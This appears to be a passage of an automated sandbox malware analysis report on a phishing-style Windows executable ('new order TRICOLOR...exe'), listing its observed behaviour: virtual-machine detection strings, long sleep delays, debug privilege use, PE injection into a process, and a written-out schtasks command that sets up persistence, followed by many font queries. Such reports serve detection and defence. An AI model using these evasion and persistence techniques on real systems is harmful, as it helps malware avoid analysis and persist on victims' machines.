                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 4072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 3280Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 1844Thread sleep count: 3411 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 1844Thread sleep count: 6409 > 30Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWindow / User API: threadDelayed 3411Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWindow / User API: threadDelayed 6409Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.520645254.00000000010ED000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0112DFD8 LdrInitializeThunk,5_2_0112DFD8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeMemory written: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmpJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe {path}Jump to behavior
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
